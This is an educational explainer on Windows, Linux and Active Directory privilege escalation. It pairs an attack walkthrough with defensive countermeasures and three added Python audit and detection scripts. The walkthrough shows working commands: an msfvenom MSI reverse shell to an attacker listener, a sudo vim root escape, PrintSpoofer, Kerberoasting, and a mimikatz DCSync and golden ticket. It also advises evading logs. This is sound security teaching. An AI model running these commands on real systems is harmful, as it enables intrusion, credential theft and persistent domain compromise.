ATT&CK Techniques T1068 / T1078 / T1548 - Privilege Escalation

PRIVILEGE ESCALATION

After initial compromise, attackers exploit system weaknesses, misconfigurations, and stolen credentials to climb from low-privilege access to full system or domain control.

HIGH SEVERITY - POST-EXPLOITATION STAGE

Primary Target: SYSTEM - NT AUTHORITY\SYSTEM or root, the highest OS-level access
ATT&CK Techniques: 40+ - MITRE-catalogued escalation methods across Windows & Linux
Key Prerequisite: LOW - any initial foothold, even a limited user account, suffices
End Goal: DA - Domain Admin, full control over the Active Directory environment
01 - Access Hierarchy

DOMAIN ADMIN - Owns entire AD forest - APEX TARGET
Domain Admin (DA)
Full control over Active Directory. Can create accounts, modify GPOs, access all machines, and replicate password hashes (DCSync). Game over for the organization.

NT AUTHORITY\SYSTEM - Unrestricted local OS access - CRITICAL
SYSTEM Privilege
Highest local privilege level. Runs as the OS itself. Can access all processes, dump LSASS, install drivers, and disable security tools. Enables further lateral movement.

LOCAL ADMINISTRATOR - Full local machine control - HIGH
Local Admin
Can install software, modify system settings, and read all local files. Enables UAC bypass, credential dumping from the SAM, and impersonation attacks via token manipulation.

STANDARD USER - Limited OS access plus a few privileges - MEDIUM
Standard User
Normal domain or local account. Limited to user-space operations. May hold SeImpersonatePrivilege (Potato attacks) or have access to vulnerable services, scheduled tasks, or unquoted service paths.

GUEST / ANON - Minimal to no privileges - ENTRY POINT
Initial Foothold
Starting point after initial compromise - an unprivileged shell, limited service account, or guest access. Goal: escape this tier immediately using any available escalation vector.

ESCALATION PATHS

🪟 WINDOWS VECTORS
UAC bypass, token impersonation, unquoted service paths, DLL hijacking, kernel exploits, AlwaysInstallElevated, scheduled tasks

🐧 LINUX VECTORS
SUID/SGID binaries, sudo misconfiguration, cron job abuse, PATH hijacking, kernel exploits, Docker escape, capabilities abuse

☁️ CLOUD / AD VECTORS
Kerberoasting, AS-REP roasting, ACL abuse, DCSync, Golden/Silver Ticket, RBCD, IAM misconfiguration

KEY INSIGHT

Attackers rarely need a zero-day. Over 80% of real-world escalations exploit misconfigurations, excessive permissions, or credential reuse - not software vulnerabilities.

02 - Attack Flow Diagram

[Attack flow diagram: PRIVILEGE ESCALATION CHAIN]
① ENTRY - 🎯 Foothold: Guest / Low User
② RECON - 🔭 Enumerate SUIDs / Services
③ EXPLOIT - UAC / Token / CVE
④ ESCALATE - 🔑 Admin / SYSTEM: full local control
⑤ HARVEST - 💀 Credential dump: LSASS / NTDS
⑥ OWN - 👑 Domain Admin

03 - Step-by-Step Walkthrough

Phase 01 - Initial Compromise

ESTABLISHING A FOOTHOLD

CURRENT LEVEL GUEST / LOW USER

Privilege escalation begins after the attacker gains any access to a system - a phishing payload, an exploited service, or a stolen credential. The initial shell is typically unprivileged, and the race to escalate begins immediately.

  • Initial shell may be a web shell, reverse shell, or interactive session
  • Service account shells (IIS, Apache) often have limited but exploitable privileges
  • First actions: stabilize shell, check current user and privileges
  • Identify OS, patch level, and installed security tools
  • Silence logs and evade detection before proceeding
reverse_shell - initial access
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ whoami /priv
Privilege Name            Description          State
SeChangeNotifyPrivilege   Bypass traverse...   Enabled
SeImpersonatePrivilege    Impersonate client   Enabled

$ systeminfo | findstr /B /C:"OS"
OS Name: Microsoft Windows Server 2019
[+] SeImpersonatePrivilege found - Potato attack viable
Phase 02 - Local Reconnaissance

PRIVILEGE ENUMERATION

CURRENT LEVEL STANDARD USER

Before exploiting, the attacker maps every escalation surface on the system. Automated tools like WinPEAS and LinPEAS scan hundreds of misconfiguration categories in seconds, revealing attack paths invisible to manual inspection.

  • WinPEAS/LinPEAS - comprehensive PrivEsc enumeration scripts
  • Check SUID/SGID binaries, sudo -l, writable service paths
  • Enumerate scheduled tasks, cron jobs, and startup programs
  • Identify unpatched CVEs via patch level and kernel version
  • Search for credentials in config files, environment vars, registry
winpeas - local enumeration
$ .\winPEASx64.exe quiet
════════════ Interesting Services ═══════════
VulnSvc - Unquoted path: C:\Program Files\Vuln App\service.exe
WebApp  - Runs as: NT AUTHORITY\SYSTEM !

════════════ AlwaysInstallElevated ══════════
HKLM: 1 ← VULNERABLE
HKCU: 1 ← VULNERABLE

════════════ Credentials in Files ═══════════
C:\inetpub\wwwroot\web.config - password found!
[*] 3 escalation paths discovered
Phase 03 - Windows Escalation

WINDOWS PRIVESC

ESCALATING TO LOCAL ADMINISTRATOR

Windows offers a vast attack surface for privilege escalation. Misconfigurations in services, registry keys, and installation policies frequently allow an attacker to gain Administrator or SYSTEM privileges without a kernel exploit.

  • Unquoted Service Path - place malicious binary in path gap
  • AlwaysInstallElevated - craft malicious MSI for SYSTEM shell
  • Weak Service Permissions - replace or modify service binary
  • UAC Bypass - Fodhelper, eventvwr, CMSTP auto-elevation
  • DLL Hijacking - drop malicious DLL in privileged search path
msfvenom + service path exploit
# AlwaysInstallElevated - MSI payload
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o priv.msi
Payload size: 7168 bytes → priv.msi

C:\> msiexec /quiet /qn /i priv.msi

# On listener: connect from 10.10.10.25:49852
C:\Windows\system32> whoami
NT AUTHORITY\SYSTEM ✓
Phase 03 - Linux Escalation

LINUX PRIVESC

ESCALATING TO ROOT

Linux escalation commonly exploits SUID binaries, misconfigured sudo rules, writable cron jobs, and abusable Linux capabilities. GTFOBins documents hundreds of legitimate tools that can be abused for privilege escalation.

  • SUID binary abuse - find / -perm -4000 → use GTFOBins technique
  • sudo -l misconfig - NOPASSWD entries on shells, editors, scripts
  • Writable /etc/passwd - add root-level user with known password
  • Cron PATH hijack - prepend writable path before root cron scripts
  • Docker group - mount host FS via privileged container escape
linux - sudo misconfiguration exploit
$ sudo -l
User www-data may run the following:
    (ALL) NOPASSWD: /usr/bin/vim

# GTFOBins: vim sudo escape
$ sudo vim -c ':/bin/bash'

root@target:~# id
uid=0(root) gid=0(root) groups=0(root)

root@target:~# cat /etc/shadow
root:$6$xyz...:19800:0:99999:7:::
Phase 04 - Token Manipulation

TOKEN IMPERSONATION

ESCALATING TO NT AUTHORITY\SYSTEM

Windows access tokens are the OS objects that define a process's security context. With SeImpersonatePrivilege, an attacker can steal or forge a high-privilege token and attach it to a new process, gaining that identity without ever knowing the account's password.

  • Potato family - PrintSpoofer, RoguePotato, SweetPotato coerce a SYSTEM process into authenticating to a local listener, then impersonate its token
  • Incognito / Meterpreter - list and impersonate available tokens in memory
  • Service accounts (IIS, MSSQL) commonly hold SeImpersonatePrivilege
  • Token duplication: OpenProcessToken → DuplicateTokenEx → CreateProcessWithTokenW
  • Often the fastest path to SYSTEM in a Windows web server environment
PrintSpoofer - token impersonation
C:\> whoami
iis apppool\defaultapppool

C:\> .\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] Impersonated NT AUTHORITY\SYSTEM
[+] Launching cmd.exe as SYSTEM

C:\Windows\system32> whoami
nt authority\system ✓
Phase 05 - Active Directory

AD PRIVILEGE ESCALATION

ESCALATING TO DOMAIN ADMIN

Active Directory escalation abuses Kerberos, ACL misconfigurations, and delegation settings to elevate domain privileges. These attacks rarely trigger traditional security tools because they use legitimate protocol features.

  • Kerberoasting - request TGS for SPNs, offline crack service account hashes
  • AS-REP Roasting - attack accounts with pre-auth disabled
  • ACL Abuse - GenericWrite/GenericAll on high-privilege objects
  • Resource-Based Constrained Delegation (RBCD) - abuse delegation settings to obtain service tickets as privileged users
  • GPO abuse - modify Group Policy applied to Domain Admins OU
Rubeus + Hashcat - Kerberoasting
# Request service tickets for all SPNs
C:\> Rubeus.exe kerberoast /outfile:hashes.txt
[*] Found 3 roastable user(s)
svc_sql / krb5tgs$23$*svc_sql$...

# Crack offline - no domain interaction
$ hashcat -m 13100 hashes.txt rockyou.txt
svc_sql:Summer2024!

# svc_sql is member of Domain Admins!
CORP\svc_sql → Domain Admins ✓
Phase 06 - Domain Dominance

DOMAIN ADMIN ACHIEVED

CURRENT LEVEL DOMAIN ADMINISTRATOR

Domain Admin privilege means complete organizational compromise. The attacker can create persistent backdoor accounts, forge Kerberos tickets, replicate all password hashes, and access every system across the domain indefinitely.

  • DCSync - replicate all NTLM hashes from the Domain Controller
  • Golden Ticket - forge TGTs using krbtgt hash for permanent access
  • Skeleton Key - patch LSASS on DC to accept universal password
  • Create hidden backdoor admin accounts for persistence
  • Disable security tools, tamper with logs, establish C2 tunnels
mimikatz - golden ticket + persistence
# DCSync - pull krbtgt hash
mimikatz # lsadump::dcsync /user:krbtgt
* Primary: NTLM hash: 31d6cfe0d16ae931...

# Forge Golden Ticket
mimikatz # kerberos::golden /user:backdoor /domain:corp.local /sid:S-1-5-21-... /krbtgt:31d6cfe0...
Golden ticket for 'backdoor @ corp.local' successfully submitted

[!] Permanent domain access established.
[!] Organization FULLY COMPROMISED ✓

04 - Common Attack Vectors

🎰
Kernel Exploits
CVE-BASED - HIGH RELIABILITY
Unpatched OS vulnerabilities allow direct ring-0 code execution. Examples: DirtyPipe (CVE-2022-0847), PrintNightmare (CVE-2021-1675), Dirty COW, EternalBlue. Brutal but noisy.
🔧
Service Misconfigurations
WINDOWS - VERY COMMON
Unquoted service paths, weak ACLs on service binaries, and modifiable service registry keys allow replacement of the binary executed as SYSTEM.
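The unquoted-path weakness named in Phase 03 and in this card can be audited by listing exactly which prefixes Windows would try before the intended binary. This is an added example, not code from the original page; the service names and ImagePath values are constructed.

```python
"""Audit Windows service ImagePath values for the unquoted-path weakness
(added example, not from the original page). When an unquoted ImagePath has
spaces, the service control manager tries each space-delimited prefix as an
executable first: C:\\Program Files\\Vuln App\\service.exe is probed as
C:\\Program.exe, then C:\\Program Files\\Vuln.exe, before the real binary.
Quote the path to fix it; until then each probed location needs a write-ACL review."""
from __future__ import annotations
import re

# Constructed (service name -> ImagePath) pairs as stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath.
SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Program Files\Vuln App\service.exe",
    "WebApp": r'"C:\Program Files\Web App\web.exe" -config "C:\Program Files\Web App\app.cfg"',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "Updater": r"C:\Program Files (x86)\Acme Tools\updater.exe /service",
}

def hijack_candidates(image_path: str) -> list[str]:
    """Return the executables CreateProcess would try before the intended one.
    An empty list means the path is safe: quoted, or no spaces before the binary.
    Arguments after the .exe are ignored because they do not affect resolution."""
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []
    m = re.match(r"(.*?\.exe)(\s.*)?$", path, re.IGNORECASE)  # strip trailing arguments
    exe = m.group(1) if m else path
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def audit(services: dict[str, str]) -> dict[str, list[str]]:
    """Map each vulnerable service to the locations whose write ACLs need review."""
    return {name: c for name, p in services.items() if (c := hijack_candidates(p))}

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(f"[!] {name}: unquoted path with spaces; locations probed before the real binary:")
        for c in cands:
            print("     ", c)
```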
🍟
Potato Attacks
WINDOWS - SEIMPERSONATEPRIVILEGE
PrintSpoofer, RoguePotato, SweetPotato, JuicyPotato. Coerce SYSTEM-level NTLM authentication over a local named pipe and impersonate the token. Works on service accounts.
📋
Sudo Misconfigurations
LINUX - EXTREMELY COMMON
NOPASSWD sudo rules for shells, editors (vi, nano), or scripting languages give immediate root. GTFOBins documents escape techniques for over 300 binaries.
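The sudo rules described in Phase 03 (Linux) and in this card can be reviewed mechanically before an attacker runs `sudo -l`. The following is an added example, not code from the original page or from GTFOBins; the sudoers text is constructed and the shell-capable binary list is a small assumed subset of what GTFOBins documents.

```python
"""Audit sudoers rules for entries that hand out a root shell (added example,
not from the original page). Parses the common rule form
`user host=(runas) [NOPASSWD:] cmd, cmd` and flags shells, editors and
interpreters, the GTFOBins classes that escape to an interactive root shell."""
import os
import re
# Binaries that spawn a shell once running as root (small subset of GTFOBins).
SHELL_CAPABLE = {"bash", "sh", "zsh", "dash", "vim", "vi", "nano", "less", "more",
                 "python", "python3", "perl", "ruby", "awk", "find", "env"}
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
# Constructed sudoers content for the demo.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL                             # password still required
www-data ALL=(ALL) NOPASSWD: /usr/bin/vim          # the page's example rule
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
deploy   ALL=(www-data) NOPASSWD: /usr/bin/python3 # runas is not root: lower risk
"""

def parse_rule(line):
    """Return dict(who, runas, nopasswd, cmds), or None for blanks, comments, Defaults, aliases."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line) if line and not line.startswith(SKIP) else None
    if not m:
        return None
    cmds = m.group("cmds")
    nopasswd = "NOPASSWD:" in cmds
    cmds = re.sub(r"\b(NOPASSWD|PASSWD|SETENV|NOEXEC):", "", cmds)
    runas = (m.group("runas") or "root").split(":")[0].strip() or "root"  # "(ALL:ALL)" -> "ALL"
    return {"who": m.group("who"), "runas": runas, "nopasswd": nopasswd,
            "cmds": [c.split()[0] for c in cmds.split(",") if c.strip()]}

def risky_rules(sudoers_text):
    """Return (who, runas, nopasswd, cmd) for non-root users granted a shell-capable command as root."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if not rule or rule["who"] == "root" or rule["runas"] not in ("root", "ALL"):
            continue
        for cmd in rule["cmds"]:
            if cmd == "ALL" or os.path.basename(cmd) in SHELL_CAPABLE:
                findings.append((rule["who"], rule["runas"], rule["nopasswd"], cmd))
    return findings

if __name__ == "__main__":
    for who, runas, nopasswd, cmd in risky_rules(SAMPLE_SUDOERS):
        print(f"[!] {who} -> ({runas}) {cmd} [{'NOPASSWD' if nopasswd else 'password'}]")
```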
🎫
Kerberoasting / AS-REP
ACTIVE DIRECTORY
Request TGS tickets for SPN-registered accounts, then crack them offline with no lockout risk. Weak service account passwords often reveal DA membership.
🔗
ACL / Delegation Abuse
ACTIVE DIRECTORY
Misconfigured AD object permissions (GenericWrite, WriteDACL, ForceChangePassword) allow an attacker to take control of high-privilege accounts or add themselves to privileged groups.

05 - Defensive Countermeasures

🔒
Principle of Least Privilege
Grant only the minimum permissions required. Remove SeImpersonatePrivilege from service accounts. Restrict local admin rights to IT staff. Use BloodHound to find excessive ACLs in Active Directory, then remove them.
🩹
Aggressive Patch Management
Apply OS and service patches within days, not weeks. Kernel exploits require an unpatched system. Most PrivEsc CVEs have patches available - exploit timelines show rapid weaponization after disclosure.
🛡️
Windows Credential Guard + PPL
Credential Guard isolates LSASS in virtualization-based security. Protected Process Light (PPL) prevents unauthorized LSASS memory reads, blocking Mimikatz and similar credential dumping tools.
🏛️
AD Tiered Administration
Enforce a Tier 0/1/2 model: Domain Admin credentials only ever touch Tier 0 systems (domain controllers), which prevents credential exposure on workstations. Use Privileged Access Workstations (PAWs) for all admin tasks.
📊
EDR + Behavioral Detection
Modern EDR detects PrivEsc tooling via behavioral signals: LSASS access patterns, suspicious token duplication APIs, anomalous MSI installs, and Kerberos ticket request patterns that indicate Kerberoasting.
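The Kerberoasting request pattern mentioned here (and attacked in Phase 05 and the Kerberoasting card) can be surfaced from Security event 4769 alone. This is an added example, not the page's or any EDR vendor's code; the 4769 records are constructed, and the thresholds (5-minute window, 3 distinct SPN accounts, RC4 only) are assumptions to tune per environment.

```python
"""Spot Kerberoasting-like TGS request bursts in Security event 4769 records.

Added example (not from the original page). Kerberoasting shows up as one
account requesting service tickets for many different SPN accounts within a
short window, usually with RC4 (TicketEncryptionType 0x17) because RC4 hashes
crack fastest. Field names follow the 4769 event schema; records are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

def ev(user, svc, etype, ts):
    """Build one constructed 4769 record (requester, target SPN account, etype, time)."""
    return {"TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": "10.10.10.25", "Time": ts}

SAMPLE_4769 = [
    ev("jdoe@CORP.LOCAL", "svc_sql", "0x17", "2024-06-01T09:00:01"),
    ev("jdoe@CORP.LOCAL", "svc_http", "0x17", "2024-06-01T09:00:01"),
    ev("jdoe@CORP.LOCAL", "svc_backup", "0x17", "2024-06-01T09:00:02"),
    ev("jdoe@CORP.LOCAL", "svc_ldap", "0x17", "2024-06-01T09:00:02"),
    ev("jdoe@CORP.LOCAL", "DC01$", "0x17", "2024-06-01T09:00:03"),    # machine account: benign
    ev("asmith@CORP.LOCAL", "svc_sql", "0x12", "2024-06-01T09:01:00"),  # AES, normal use
    ev("asmith@CORP.LOCAL", "svc_http", "0x12", "2024-06-01T09:30:00"),
    ev("bjones@CORP.LOCAL", "svc_sql", "0x17", "2024-06-01T10:00:00"),  # one legacy RC4 client
]

def kerberoast_candidates(events, window=timedelta(minutes=5), min_services=3, rc4_only=True):
    """Return {requester: sorted SPN accounts} for requesters that asked for tickets
    to at least `min_services` distinct user service accounts inside `window`."""
    by_user = defaultdict(list)
    for e in events:
        if rc4_only and e["TicketEncryptionType"].lower() != "0x17":
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):  # TGT renewals and machine SPNs are normal
            continue
        by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["Time"]), svc))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # slide a window starting at each request
            in_window = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                hits[user] = sorted(in_window)
                break
    return hits

if __name__ == "__main__":
    for user, services in kerberoast_candidates(SAMPLE_4769).items():
        print(f"[!] {user} requested RC4 TGS for {len(services)} SPN accounts: {', '.join(services)}")
```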
🔍
Regular PrivEsc Auditing
Run BloodHound AD attack path analysis, review sudo rules and SUID binaries periodically. Use tools like PrivescCheck and PEASS to assess your own environment before attackers do.
🎭
Application Control (WDAC/AppLocker)
Prevent execution of unauthorized tools like Mimikatz, WinPEAS, and Potato binaries. WDAC (Windows Defender Application Control) enforces allowlisting at the kernel level, blocking unsigned payloads.
🔐
Service Account Hygiene
Use Group Managed Service Accounts (gMSA) for automatic password rotation. Ensure SPNs are only set on accounts that need them. Strong, random 25+ character service account passwords defeat Kerberoasting.